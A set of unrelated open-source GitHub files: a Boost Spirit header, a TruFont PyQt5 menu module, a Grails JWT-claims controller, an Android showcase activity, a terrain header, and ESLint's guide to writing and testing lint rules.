Copyright (c) 2001-2011 Joel de Guzman
Copyright (c) 2001-2011 Hartmut Kaiser
Copyright (c) 2009 Francois Barel
http://spirit.sourceforge.net/
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
=============================================================================*/
#ifndef BOOST_SPIRIT_REPOSITORY_INCLUDE_KARMA_SUBRULE
#define BOOST_SPIRIT_REPOSITORY_INCLUDE_KARMA_SUBRULE
#if defined(_MSC_VER)
#pragma once
#endif
#include <boost/spirit/repository/home/karma/nonterminal/subrule.hpp>
#endif
| {
"pile_set_name": "Github"
} |
"""
Windows that want to plug-in their own menu entries must implement
- setupMenu(menuBar)
- menuBar()
- setMenuBar(menuBar)
"""
from PyQt5.QtGui import QKeySequence
from PyQt5.QtWidgets import QAction, QApplication, QMenu, QMenuBar
from trufont.tools import platformSpecific
MAX_RECENT_FILES = 10
class MenuBar(QMenuBar):
def __init__(self, parent=None):
super().__init__(parent)
self._spawnElementsHint = True
def shouldSpawnElements(self):
return self.parent() is None or self._spawnElementsHint
def spawnElementsHint(self):
return self._spawnElementsHint
def setSpawnElementsHint(self, value):
self._spawnElementsHint = value
def fetchMenu(self, title):
title = _trMenuString(title)
# cache lookup
child = None
for child_ in self.children():
if not isinstance(child_, QMenu):
continue
if child_.title() == title:
child = child_
if child is not None:
return child
# spawn
menu = Menu(title, self)
if self.shouldSpawnElements():
self.addMenu(menu)
return menu
def resetState(self):
for menu in self.children():
if not isinstance(menu, QMenu):
continue
menu.resetState()
class Menu(QMenu):
def shouldSpawnElements(self):
parent = self.parent()
if parent is not None:
return parent.shouldSpawnElements()
return False
def fetchAction(self, text, callback=None, shortcut=None):
if shortcut is None:
shortcut = _shortcuts.get(text)
text = _trMenuString(text)
# cache lookup
action = None
for action_ in self.actions():
if action_.text() == text:
action = action_
# spawn
if action is None:
action = QAction(text, self)
if self.shouldSpawnElements():
self.addAction(action)
# connect
action.setEnabled(True)
try:
action.triggered.disconnect()
except TypeError:
pass
if callback is not None:
action.triggered.connect(lambda: callback())
action.setShortcut(QKeySequence(shortcut))
return action
fetchMenu = MenuBar.fetchMenu
def resetState(self):
self._ready = True
# TODO: reset submenus too?
for action in self.actions():
action.setEnabled(False)
class Entries:
File = "&File"
File_New = "&New…"
File_Open = "&Open…"
File_Open_Recent = "Open &Recent"
File_Import = "&Import…"
File_Save = "&Save"
File_Save_As = "Save &As…"
File_Save_All = "Save A&ll"
File_Close = "&Close"
File_Reload = "&Revert"
File_Export = "&Export…"
File_Exit = "E&xit"
Edit = "&Edit"
Edit_Undo = "&Undo"
Edit_Redo = "&Redo"
Edit_Cut = "C&ut"
Edit_Copy = "&Copy"
Edit_Copy_As_Component = "Copy &As Component"
Edit_Paste = "&Paste"
Edit_Clear = "Cl&ear"
Edit_Select_All = "&Select All"
Edit_Deselect = "&Deselect"
Edit_Find = "&Find…"
Edit_Settings = "&Settings…"
View = "&View"
View_Zoom_In = "Zoom &In"
View_Zoom_Out = "Zoom &Out"
View_Reset_Zoom = "&Reset Zoom"
View_Next_Tab = "&Next Tab"
View_Previous_Tab = "&Previous Tab"
View_Next_Glyph = "&Next Glyph"
View_Previous_Glyph = "&Previous Glyph"
View_Layer_Up = "Layer &Up"
View_Layer_Down = "Layer &Down"
View_Show_Points = "Show P&oints"
View_Show_Coordinates = "Show &Coordinates"
View_Show_Coordinates_When_Selected = "Show Coordinates When &Selected"
View_Show_Point_Coordinates = "Always Show &Point Coordinates"
View_Show_Bezier_Handles_Coordinates = "Always Show &Bezier Handles Coordinates"
View_Show_Metrics = "Show &Metrics"
View_Show_Images = "Show &Images"
View_Show_Guidelines = "Show &Guidelines"
Font = "F&ont"
Font_Font_Info = "Font &Info"
Font_Font_Features = "Font &Features"
Font_Add_Glyphs = "&Add Glyphs…"
Font_Sort = "&Sort…"
Scripts = "&Scripts"
Scripts_Build_Extension = "&Build Extension…"
# TODO: remove metrics
Window = "&Window"
Window_Minimize = "&Minimize"
Window_Minimize_All = "Minimize &All"
Window_Zoom = "&Zoom"
Window_Groups = "&Groups"
Window_Kerning = "&Kerning"
Window_Metrics = "M&etrics"
Window_Scripting = "&Scripting"
Window_Properties = "&Properties"
Window_Output = "&Output"
Help = "&Help"
Help_Documentation = "&Documentation"
Help_Report_An_Issue = "&Report an Issue"
Help_About = "&About"
_shortcuts = {
Entries.File_New: QKeySequence.New,
Entries.File_Open: QKeySequence.Open,
Entries.File_Save: QKeySequence.Save,
Entries.File_Save_As: QKeySequence.SaveAs,
Entries.File_Close: platformSpecific.closeKeySequence(),
Entries.File_Export: "Ctrl+E",
Entries.File_Exit: QKeySequence.Quit,
Entries.Edit_Undo: QKeySequence.Undo,
Entries.Edit_Redo: QKeySequence.Redo,
Entries.Edit_Cut: QKeySequence.Cut,
Entries.Edit_Copy: QKeySequence.Copy,
Entries.Edit_Copy_As_Component: "Ctrl+Alt+C",
Entries.Edit_Paste: QKeySequence.Paste,
Entries.Edit_Select_All: QKeySequence.SelectAll,
Entries.Edit_Deselect: "Ctrl+D",
Entries.Edit_Find: QKeySequence.Find,
Entries.View_Zoom_In: QKeySequence.ZoomIn,
Entries.View_Zoom_Out: QKeySequence.ZoomOut,
Entries.View_Reset_Zoom: "Ctrl+0",
Entries.View_Next_Tab: QKeySequence.NextChild,
Entries.View_Previous_Tab: platformSpecific.previousTabSequence(),
Entries.View_Next_Glyph: "End",
Entries.View_Previous_Glyph: "Home",
Entries.View_Layer_Up: "PgUp",
Entries.View_Layer_Down: "PgDown",
Entries.View_Show_Points: "Ctrl+Shift+N",
Entries.View_Show_Metrics: "Ctrl+Shift+M",
Entries.View_Show_Guidelines: "Ctrl+Shift+G",
Entries.Font_Font_Info: "Ctrl+Alt+I",
Entries.Font_Font_Features: "Ctrl+Alt+F",
Entries.Font_Add_Glyphs: "Ctrl+G",
Entries.Window_Minimize: "Ctrl+M",
Entries.Window_Groups: "Ctrl+Alt+G",
Entries.Window_Kerning: "Ctrl+Alt+K",
Entries.Window_Metrics: "Ctrl+Alt+S",
Entries.Window_Scripting: "Ctrl+Alt+R",
Entries.Window_Properties: "Ctrl+Alt+P",
Entries.Window_Output: "Ctrl+Alt+O",
}
def globalMenuBar():
menuBar = MenuBar()
fileMenu = menuBar.fetchMenu(Entries.File)
fileMenu.fetchAction(Entries.File_New)
fileMenu.fetchAction(Entries.File_Open)
fileMenu.fetchMenu(Entries.File_Open_Recent)
# no-op, caller will maintain this
if not platformSpecific.mergeOpenAndImport():
fileMenu.fetchAction(Entries.File_Import)
fileMenu.addSeparator()
fileMenu.fetchAction(Entries.File_Save)
fileMenu.fetchAction(Entries.File_Save_As)
fileMenu.fetchAction(Entries.File_Save_All)
fileMenu.fetchAction(Entries.File_Close)
fileMenu.fetchAction(Entries.File_Reload)
fileMenu.addSeparator()
fileMenu.fetchAction(Entries.File_Export)
fileMenu.fetchAction(Entries.File_Exit)
editMenu = menuBar.fetchMenu(Entries.Edit)
editMenu.fetchAction(Entries.Edit_Undo)
editMenu.fetchAction(Entries.Edit_Redo)
editMenu.addSeparator()
editMenu.fetchAction(Entries.Edit_Cut)
editMenu.fetchAction(Entries.Edit_Copy)
editMenu.fetchAction(Entries.Edit_Copy_As_Component)
editMenu.fetchAction(Entries.Edit_Paste)
editMenu.fetchAction(Entries.Edit_Clear)
editMenu.fetchAction(Entries.Edit_Select_All)
# editMenu.fetchAction(Entries.Edit_Deselect)
editMenu.fetchAction(Entries.Edit_Find)
editMenu.addSeparator()
editMenu.fetchAction(Entries.Edit_Settings)
menuBar.addMenu(editMenu)
viewMenu = menuBar.fetchMenu(Entries.View)
viewMenu.fetchAction(Entries.View_Zoom_In)
viewMenu.fetchAction(Entries.View_Zoom_Out)
viewMenu.fetchAction(Entries.View_Reset_Zoom)
viewMenu.addSeparator()
viewMenu.fetchAction(Entries.View_Next_Tab)
viewMenu.fetchAction(Entries.View_Previous_Tab)
viewMenu.fetchAction(Entries.View_Next_Glyph)
viewMenu.fetchAction(Entries.View_Previous_Glyph)
viewMenu.fetchAction(Entries.View_Layer_Up)
viewMenu.fetchAction(Entries.View_Layer_Down)
viewMenu.addSeparator()
viewMenu.fetchAction(Entries.View_Show_Points)
coordinatesSubmenu = viewMenu.fetchMenu(Entries.View_Show_Coordinates)
coordinatesSubmenu.fetchAction(Entries.View_Show_Coordinates_When_Selected)
coordinatesSubmenu.fetchAction(Entries.View_Show_Point_Coordinates)
coordinatesSubmenu.fetchAction(Entries.View_Show_Bezier_Handles_Coordinates)
viewMenu.fetchAction(Entries.View_Show_Metrics)
viewMenu.fetchAction(Entries.View_Show_Images)
viewMenu.fetchAction(Entries.View_Show_Guidelines)
fontMenu = menuBar.fetchMenu(Entries.Font)
fontMenu.fetchAction(Entries.Font_Font_Info)
fontMenu.fetchAction(Entries.Font_Font_Features)
fontMenu.addSeparator()
fontMenu.fetchAction(Entries.Font_Add_Glyphs)
fontMenu.fetchAction(Entries.Font_Sort)
menuBar.fetchMenu(Entries.Scripts)
# no-op, caller will maintain this
windowMenu = menuBar.fetchMenu(Entries.Window)
if platformSpecific.windowCommandsInMenu():
windowMenu.fetchAction(Entries.Window_Minimize)
windowMenu.fetchAction(Entries.Window_Minimize_All)
windowMenu.fetchAction(Entries.Window_Zoom)
windowMenu.addSeparator()
windowMenu.fetchAction(Entries.Window_Groups)
windowMenu.fetchAction(Entries.Window_Kerning)
windowMenu.fetchAction(Entries.Window_Metrics)
windowMenu.fetchAction(Entries.Window_Scripting)
windowMenu.fetchAction(Entries.Window_Properties)
windowMenu.addSeparator()
windowMenu.fetchAction(Entries.Window_Output)
helpMenu = menuBar.fetchMenu(Entries.Help)
helpMenu.fetchAction(Entries.Help_Documentation)
helpMenu.fetchAction(Entries.Help_Report_An_Issue)
helpMenu.addSeparator()
helpMenu.fetchAction(Entries.Help_About)
return menuBar
def _trMenuString(string):
return QApplication.translate("AppMenu", string)
| {
"pile_set_name": "Github"
} |
package rest
import grails.converters.JSON
import grails.plugin.springsecurity.annotation.Secured
import grails.plugin.springsecurity.rest.token.AccessToken
class JwtController {
def springSecurityService
@Secured(['ROLE_USER'])
def claims() {
AccessToken accessToken = springSecurityService.authentication as AccessToken
render accessToken.accessTokenJwt.JWTClaimsSet.claims as JSON
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2014 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package android.support.v17.leanback.supportleanbackshowcase.app.cards;
import android.app.Activity;
import android.graphics.Color;
import android.graphics.drawable.ColorDrawable;
import android.os.Bundle;
import android.support.v17.leanback.app.GuidedStepFragment;
import android.support.v17.leanback.supportleanbackshowcase.app.dialog.DialogExampleFragment;
import android.support.v17.leanback.supportleanbackshowcase.R;
/**
* TODO: Javadoc
*/
public class CardExampleActivity extends Activity {
@Override public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_cards_example);
}
}
| {
"pile_set_name": "Github"
} |
/*
CDTestFramework http://codercorner.com
Copyright (c) 2007-2008 Pierre Terdiman, [email protected]
This software is provided 'as-is', without any express or implied warranty.
In no event will the authors be held liable for any damages arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it freely,
subject to the following restrictions:
1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software.
3. This notice may not be removed or altered from any source distribution.
*/
#ifndef TERRAIN_H
#define TERRAIN_H
class TerrainData
{
public:
TerrainData();
~TerrainData();
void init(udword size, float offset, float width, float chaos, bool flat=false, const Point* pos=NULL);
void release();
udword size;
udword nbVerts;
udword nbFaces;
float offset;
float width;
float chaos;
Point* verts;
Point* colors;
Point* normals;
udword* faces;
};
void CreateTerrain();
void ReleaseTerrain();
void RenderTerrain();
void RenderTerrainTriangles(udword nbTriangles, const udword* indices);
const Model* GetTerrainModel();
#endif
| {
"pile_set_name": "Github"
} |
# Working with Rules
Each rule in ESLint has two files named with its identifier (for example, `no-extra-semi`).
* in the `lib/rules` directory: a source file (for example, `no-extra-semi.js`)
* in the `tests/lib/rules` directory: a test file (for example, `no-extra-semi.js`)
**Important:** If you submit a **core** rule to the ESLint repository, you **must** follow some conventions explained below.
Here is the basic format of the source file for a rule:
```js
/**
* @fileoverview Rule to disallow unnecessary semicolons
* @author Nicholas C. Zakas
*/
"use strict";
//------------------------------------------------------------------------------
// Rule Definition
//------------------------------------------------------------------------------
module.exports = function(context) {
return {
// callback functions
};
};
module.exports.schema = []; // no options
```
## Rule Basics
`schema` (array) specifies the [options](#options-schemas) so ESLint can prevent invalid [rule configurations](../user-guide/configuring.md#configuring-rules)
`create` (function) returns an object with methods that ESLint calls to "visit" nodes while traversing the abstract syntax tree (AST as defined by [ESTree](https://github.com/estree/estree)) of JavaScript code:
* if a key is a node type, ESLint calls that **visitor** function while going **down** the tree
* if a key is a node type plus `:exit`, ESLint calls that **visitor** function while going **up** the tree
* if a key is an event name, ESLint calls that **handler** function for [code path analysis](./code-path-analysis.md)
A rule can use the current node and its surrounding tree to report or fix problems.
Here are methods for the [array-callback-return](../rules/array-callback-return.md) rule:
```js
function checkLastSegment (node) {
// report problem for function if last code path segment is reachable
}
module.exports = function(context) {
// declare the state of the rule
return {
ReturnStatement: function(node) {
// at a ReturnStatement node while going down
},
// at a function expression node while going up:
"FunctionExpression:exit": checkLastSegment,
"ArrowFunctionExpression:exit": checkLastSegment,
onCodePathStart: function (codePath, node) {
// at the start of analyzing a code path
},
onCodePathEnd: function(codePath, node) {
// at the end of analyzing a code path
}
};
};
```
## The Context Object
The `context` object contains additional functionality that is helpful for rules to do their jobs. As the name implies, the `context` object contains information that is relevant to the context of the rule. The `context` object has the following properties:
* `parserOptions` - the parser options configured for this run (more details [here](../user-guide/configuring.md#specifying-parser-options)).
* `id` - the rule ID.
* `options` - an array of rule options.
* `settings` - the `settings` from configuration.
* `parserPath` - the full path to the `parser` from configuration.
Additionally, the `context` object has the following methods:
* `getAncestors()` - returns an array of ancestor nodes based on the current traversal.
* `getDeclaredVariables(node)` - returns the declared variables on the given node.
* `getFilename()` - returns the filename associated with the source.
* `getScope()` - returns the current scope.
* `getSourceCode()` - returns a `SourceCode` object that you can use to work with the source that was passed to ESLint
* `markVariableAsUsed(name)` - marks the named variable in scope as used. This affects the [no-unused-vars](../rules/no-unused-vars.md) rule.
* `report(descriptor)` - reports a problem in the code.
**Deprecated:** The following methods on the `context` object are deprecated. Please use the corresponding methods on `SourceCode` instead:
* `getAllComments()` - returns an array of all comments in the source. Use `sourceCode.getAllComments()` instead.
* `getComments(node)` - returns the leading and trailing comments arrays for the given node. Use `sourceCode.getComments(node)` instead.
* `getFirstToken(node)` - returns the first token representing the given node. Use `sourceCode.getFirstToken(node)` instead.
* `getFirstTokens(node, count)` - returns the first `count` tokens representing the given node. Use `sourceCode.getFirstTokens(node, count)` instead.
* `getJSDocComment(node)` - returns the JSDoc comment for a given node or `null` if there is none. Use `sourceCode.getJSDocComment(node)` instead.
* `getLastToken(node)` - returns the last token representing the given node. Use `sourceCode.getLastToken(node)` instead.
* `getLastTokens(node, count)` - returns the last `count` tokens representing the given node. Use `sourceCode.getLastTokens(node, count)` instead.
* `getNodeByRangeIndex(index)` - returns the deepest node in the AST containing the given source index. Use `sourceCode.getNodeByRangeIndex(index)` instead.
* `getSource(node)` - returns the source code for the given node. Omit `node` to get the whole source. Use `sourceCode.getText(node)` instead.
* `getSourceLines()` - returns the entire source code split into an array of string lines. Use `sourceCode.lines` instead.
* `getTokenAfter(nodeOrToken)` - returns the first token after the given node or token. Use `sourceCode.getTokenAfter(nodeOrToken)` instead.
* `getTokenBefore(nodeOrToken)` - returns the first token before the given node or token. Use `sourceCode.getTokenBefore(nodeOrToken)` instead.
* `getTokenByRangeStart(index)` - returns the token whose range starts at the given index in the source. Use `sourceCode.getTokenByRangeStart(index)` instead.
* `getTokens(node)` - returns all tokens for the given node. Use `sourceCode.getTokens(node)` instead.
* `getTokensAfter(nodeOrToken, count)` - returns `count` tokens after the given node or token. Use `sourceCode.getTokensAfter(nodeOrToken, count)` instead.
* `getTokensBefore(nodeOrToken, count)` - returns `count` tokens before the given node or token. Use `sourceCode.getTokensBefore(nodeOrToken, count)` instead.
* `getTokensBetween(node1, node2)` - returns the tokens between two nodes. Use `sourceCode.getTokensBetween(node1, node2)` instead.
* `report(node, [location], message)` - reports a problem in the code.
### context.report()
The main method you'll use is `context.report()`, which publishes a warning or error (depending on the configuration being used). This method accepts a single argument, which is an object containing the following properties:
* `message` - the problem message.
* `node` - (optional) the AST node related to the problem. If present and `loc` is not specified, then the starting location of the node is used as the location of the problem.
* `loc` - (optional) an object specifying the location of the problem. If both `loc` and `node` are specified, then the location is used from `loc` instead of `node`.
* `line` - the 1-based line number at which the problem occurred.
* `column` - the 0-based column number at which the problem occurred.
* `data` - (optional) placeholder data for `message`.
* `fix` - (optional) a function that applies a fix to resolve the problem.
Note that at least one of `node` or `loc` is required.
The simplest example is to use just `node` and `message`:
```js
context.report({
node: node,
message: "Unexpected identifier"
});
```
The node contains all of the information necessary to figure out the line and column number of the offending text as well the source text representing the node.
You can also use placeholders in the message and provide `data`:
```js
{% raw %}
context.report({
node: node,
message: "Unexpected identifier: {{ identifier }}",
data: {
identifier: node.name
}
});
{% endraw %}
```
Note that leading and trailing whitespace is optional in message parameters.
The node contains all of the information necessary to figure out the line and column number of the offending text as well the source text representing the node.
### Applying Fixes
If you'd like ESLint to attempt to fix the problem you're reporting, you can do so by specifying the `fix` function when using `context.report()`. The `fix` function receives a single argument, a `fixer` object, that you can use to apply a fix. For example:
```js
context.report({
node: node,
message: "Missing semicolon".
fix: function(fixer) {
return fixer.insertTextAfter(node, ";");
}
});
```
Here, the `fix()` function is used to insert a semicolon after the node. Note that the fix is not immediately applied and may not be applied at all if there are conflicts with other fixes. If the fix cannot be applied, then the problem message is reported as usual; if the fix can be applied, then the problem message is not reported.
The `fixer` object has the following methods:
* `insertTextAfter(nodeOrToken, text)` - inserts text after the given node or token
* `insertTextAfterRange(range, text)` - inserts text after the given range
* `insertTextBefore(nodeOrToken, text)` - inserts text before the given node or token
* `insertTextBeforeRange(range, text)` - inserts text before the given range
* `remove(nodeOrToken)` - removes the given node or token
* `removeRange(range)` - removes text in the given range
* `replaceText(nodeOrToken, text)` - replaces the text in the given node or token
* `replaceTextRange(range, text)` - replaces the text in the given range
Best practices for fixes:
1. Make fixes that are as small as possible. Anything more than a single character is risky and could prevent other, simpler fixes from being made.
1. Only make one fix per message. This is enforced because you must return the result of the fixer operation from `fix()`.
1. Fixes should not introduce clashes with other rules. You can accidentally introduce a new problem that won't be reported until ESLint is run again. Another good reason to make as small a fix as possible.
### context.options
Some rules require options in order to function correctly. These options appear in configuration (`.eslintrc`, command line, or in comments). For example:
```json
{
"quotes": [2, "double"]
}
```
The `quotes` rule in this example has one option, `"double"` (the `2` is the error level). You can retrieve the options for a rule by using `context.options`, which is an array containing every configured option for the rule. In this case, `context.options[0]` would contain `"double"`:
```js
module.exports = function(context) {
var isDouble = (context.options[0] === "double");
// ...
}
```
Since `context.options` is just an array, you can use it to determine how many options have been passed as well as retrieving the actual options themselves. Keep in mind that the error level is not part of `context.options`, as the error level cannot be known or modified from inside a rule.
When using options, make sure that your rule has some logic defaults in case the options are not provided.
### context.getSourceCode()
The `SourceCode` object is the main object for getting more information about the source code being linted. You can retrieve the `SourceCode` object at any time by using the `getSourceCode()` method:
```js
module.exports = function(context) {
var sourceCode = context.getSourceCode();
// ...
}
```
Once you have an instance of `SourceCode`, you can use the methods on it to work with the code:
* `getAllComments()` - returns an array of all comments in the source.
* `getComments(node)` - returns the leading and trailing comments arrays for the given node.
* `getFirstToken(node)` - returns the first token representing the given node.
* `getFirstTokens(node, count)` - returns the first `count` tokens representing the given node.
* `getJSDocComment(node)` - returns the JSDoc comment for a given node or `null` if there is none.
* `getLastToken(node)` - returns the last token representing the given node.
* `getLastTokens(node, count)` - returns the last `count` tokens representing the given node.
* `getNodeByRangeIndex(index)` - returns the deepest node in the AST containing the given source index.
* `isSpaceBetweenTokens(first, second)` - returns true if there is a whitespace character between the two tokens.
* `getText(node)` - returns the source code for the given node. Omit `node` to get the whole source.
* `getTokenAfter(nodeOrToken)` - returns the first token after the given node or token.
* `getTokenBefore(nodeOrToken)` - returns the first token before the given node or token.
* `getTokenByRangeStart(index)` - returns the token whose range starts at the given index in the source.
* `getTokens(node)` - returns all tokens for the given node.
* `getTokensAfter(nodeOrToken, count)` - returns `count` tokens after the given node or token.
* `getTokensBefore(nodeOrToken, count)` - returns `count` tokens before the given node or token.
* `getTokensBetween(node1, node2)` - returns the tokens between two nodes.
There are also some properties you can access:
* `hasBOM` - the flag to indicate whether or not the source code has Unicode BOM.
* `text` - the full text of the code being linted. Unicode BOM has been stripped from this text.
* `ast` - the `Program` node of the AST for the code being linted.
* `lines` - an array of lines, split according to the specification's definition of line breaks.
You should use a `SourceCode` object whenever you need to get more information about the code being linted.
### Options Schemas
Rules may export a `schema` property, which is a [JSON schema](http://json-schema.org/) format description of a rule's options which will be used by ESLint to validate configuration options and prevent invalid or unexpected inputs before they are passed to the rule in `context.options`.
There are two formats for a rule's exported `schema`. The first is a full JSON Schema object describing all possible options the rule accepts, including the rule's error level as the first argument and any optional arguments thereafter.
However, to simplify schema creation, rules may also export an array of schemas for each optional positional argument, and ESLint will automatically validate the required error level first. For example, the `yoda` rule accepts a primary mode argument, as well as an extra options object with named properties.
```js
// "yoda": [2, "never", { "exceptRange": true }]
module.exports.schema = [
{
"enum": ["always", "never"]
},
{
"type": "object",
"properties": {
"exceptRange": {
"type": "boolean"
}
},
"additionalProperties": false
}
];
```
In the preceding example, the error level is assumed to be the first argument. It is followed by the first optional argument, a string which may be either `"always"` or `"never"`. The final optional argument is an object, which may have a Boolean property named `exceptRange`.
To learn more about JSON Schema, we recommend looking at some [examples](http://json-schema.org/examples.html) to start, and also reading [Understanding JSON Schema](http://spacetelescope.github.io/understanding-json-schema/) (a free ebook).
### Getting the Source
If your rule needs to get the actual JavaScript source to work with, then use the `sourceCode.getText()` method. This method works as follows:
```js
// get all source
var source = sourceCode.getText();
// get source for just this AST node
var nodeSource = sourceCode.getText(node);
// get source for AST node plus previous two characters
var nodeSourceWithPrev = sourceCode.getText(node, 2);
// get source for AST node plus following two characters
var nodeSourceWithFollowing = sourceCode.getText(node, 0, 2);
```
In this way, you can look for patterns in the JavaScript text itself when the AST isn't providing the appropriate data (such as location of commas, semicolons, parentheses, etc.).
### Accessing comments
If you need to access comments for a specific node you can use `sourceCode.getComments(node)`:
```js
// the "comments" variable has a "leading" and "trailing" property containing
// its leading and trailing comments, respectively
var comments = sourceCode.getComments(node);
```
Keep in mind that comments are technically not a part of the AST and are only attached to it on demand, i.e. when you call `getComments()`.
**Note:** One of the libraries adds AST node properties for comments - do not use these properties. Always use `sourceCode.getComments()` as this is the only guaranteed API for accessing comments (we will likely change how comments are handled later).
### Accessing Code Paths
ESLint analyzes code paths while traversing AST.
You can access that code path objects with five events related to code paths.
[details here](./code-path-analysis.md)
## Rule Unit Tests
Each rule must have a set of unit tests submitted with it to be accepted. The test file is named the same as the source file but lives in `tests/lib/`. For example, if your rule source file is `lib/rules/foo.js` then your test file should be `tests/lib/rules/foo.js`.
For your rule, be sure to test:
1. All instances that should be flagged as warnings.
1. At least one pattern that should **not** be flagged as a warning.
The basic pattern for a rule unit test file is:
```js
/**
* @fileoverview Tests for no-with rule.
* @author Nicholas C. Zakas
*/
"use strict";
//------------------------------------------------------------------------------
// Requirements
//------------------------------------------------------------------------------
var rule = require("../../../lib/rules/no-with"),
RuleTester = require("../../../lib/testers/rule-tester");
//------------------------------------------------------------------------------
// Tests
//------------------------------------------------------------------------------
var ruleTester = new RuleTester();
ruleTester.run("no-with", rule, {
valid: [
"foo.bar()"
],
invalid: [
{
code: "with(foo) { bar() }",
errors: [{ message: "Unexpected use of 'with' statement.", type: "WithStatement"}]
}
]
});
```
Be sure to replace the value of `"no-with"` with your rule's ID. There are plenty of examples in the `tests/lib/rules/` directory.
### Valid Code
Each valid case can be either a string or an object. The object form is used when you need to specify additional global variables or arguments for the rule. For example, the following defines `window` as a global variable for code that should not trigger the rule being tested:
```js
valid: [
{
code: "window.alert()",
globals: [ "window" ]
}
]
```
You can also pass options to the rule (if it accepts them). These arguments are equivalent to how people can configure rules in their `.eslintrc` file. For example:
```js
valid: [
{
code: "var msg = 'Hello';",
options: [ "single" ]
}
]
```
The `options` property must be an array of options. This gets passed through to `context.options` in the rule.
### Invalid Code
Each invalid case must be an object containing the code to test and at least one message that is produced by the rule. The `errors` key specifies an array of objects, each containing a message (your rule may trigger multiple messages for the same code). You should also specify the type of AST node you expect to receive back using the `type` key. The AST node should represent the actual spot in the code where there is a problem. For example:
```js
invalid: [
{
code: "function doSomething() { var f; if (true) { var build = true; } f = build; }",
errors: [
{ message: "build used outside of binding context.", type: "Identifier" }
]
}
]
```
In this case, the message is specific to the variable being used and the AST node type is `Identifier`.
Similar to the valid cases, you can also specify `options` to be passed to the rule:
```js
invalid: [
{
code: "function doSomething() { var f; if (true) { var build = true; } f = build; }",
options: [ "double" ],
errors: [
{ message: "build used outside of binding context.", type: "Identifier" }
]
}
]
```
For simpler cases where the only thing that really matters is the error message, you can also specify any `errors` as strings. You can also have some strings and some objects, if you like.
```js
invalid: [
{
code: "'single quotes'",
options: ["double"],
errors: ["Strings must use doublequote."]
}
]
```
### Specifying Parser Options
Some tests require that a certain parser configuration must be used. This can be specified in test specifications via the `parserOptions` setting.
For example, to set `ecmaVersion` to 6 (in order to use constructs like `for ... of`):
```js
valid: [
{
code: "for (x of a) doSomething();",
parserOptions: { ecmaVersion: 6 }
}
]
```
If you are working with ES6 modules:
```js
valid: [
{
code: "export default function () {};",
parserOptions: { ecmaVersion: 6, sourceType: "module" }
}
]
```
For non-version specific features such as JSX:
```js
valid: [
{
code: "var foo = <div>{bar}</div>",
parserOptions: { ecmaFeatures: { jsx: true } }
}
]
```
The options available and the expected syntax for `parserOptions` is the same as those used in [configuration](../user-guide/configuring.md#specifying-parser-options).
### Write Several Tests
Provide as many unit tests as possible. Your pull request will never be turned down for having too many tests submitted with it!
## Performance Testing
To keep the linting process efficient and unobtrusive, it is useful to verify the performance impact of new rules or modifications to existing rules.
### Overall Performance
The `npm run perf` command gives a high-level overview of ESLint running time with default rules (`eslint:recommended`) enabled.
```bash
$ git checkout master
Switched to branch 'master'
$ npm run perf
CPU Speed is 2200 with multiplier 7500000
Performance Run #1: 1394.689313ms
Performance Run #2: 1423.295351ms
Performance Run #3: 1385.09515ms
Performance Run #4: 1382.406982ms
Performance Run #5: 1409.68566ms
Performance budget ok: 1394.689313ms (limit: 3409.090909090909ms)
$ git checkout my-rule-branch
Switched to branch 'my-rule-branch'
$ npm run perf
CPU Speed is 2200 with multiplier 7500000
Performance Run #1: 1443.736547ms
Performance Run #2: 1419.193291ms
Performance Run #3: 1436.018228ms
Performance Run #4: 1473.605485ms
Performance Run #5: 1457.455283ms
Performance budget ok: 1443.736547ms (limit: 3409.090909090909ms)
```
### Per-rule Performance
ESLint has a built-in method to track performance of individual rules. Setting the `TIMING` environment variable will trigger the display, upon linting completion, of the ten longest-running rules, along with their individual running time and relative performance impact as a percentage of total rule processing time.
```bash
$ TIMING=1 eslint lib
Rule | Time (ms) | Relative
:-----------------------|----------:|--------:
no-multi-spaces | 52.472 | 6.1%
camelcase | 48.684 | 5.7%
no-irregular-whitespace | 43.847 | 5.1%
valid-jsdoc | 40.346 | 4.7%
handle-callback-err | 39.153 | 4.6%
space-infix-ops | 35.444 | 4.1%
no-undefined | 25.693 | 3.0%
no-shadow | 22.759 | 2.7%
no-empty-class | 21.976 | 2.6%
semi | 19.359 | 2.3%
```
To test one rule explicitly, combine the `--no-eslintrc`, and `--rule` options:
```bash
$ TIMING=1 eslint --no-eslintrc --rule "quotes: [2, 'double']" lib
Rule | Time (ms) | Relative
:------|----------:|--------:
quotes | 18.066 | 100.0%
```
## Rule Naming Conventions
The rule naming conventions for ESLint are fairly simple:
* If your rule is disallowing something, prefix it with `no-` such as `no-eval` for disallowing `eval()` and `no-debugger` for disallowing `debugger`.
* If your rule is enforcing the inclusion of something, use a short name without a special prefix.
* Keep your rule names as short as possible, use abbreviations where appropriate, and no more than four words.
* Use dashes between words.
## Rule Acceptance Criteria
Because rules are highly personal (and therefore very contentious), accepted rules should:
* Not be library-specific.
* Demonstrate a possible issue that can be resolved by rewriting the code.
* Be general enough so as to apply for a large number of developers.
* Not be the opposite of an existing rule.
* Not overlap with an existing rule.
## Runtime Rules
The thing that makes ESLint different from other linters is the ability to define custom rules at runtime. This is perfect for rules that are specific to your project or company and wouldn't make sense for ESLint to ship with. With runtime rules, you don't have to wait for the next version of ESLint or be disappointed that your rule isn't general enough to apply to the larger JavaScript community, just write your rules and include them at runtime.
Runtime rules are written in the same format as all other rules. Create your rule as you would any other and then follow these steps:
1. Place all of your runtime rules in the same directory (i.e., `eslint_rules`).
2. Create a [configuration file](../user-guide/configuring.md) and specify your rule ID error level under the `rules` key. Your rule will not run unless it has a value of `1` or `2` in the configuration file.
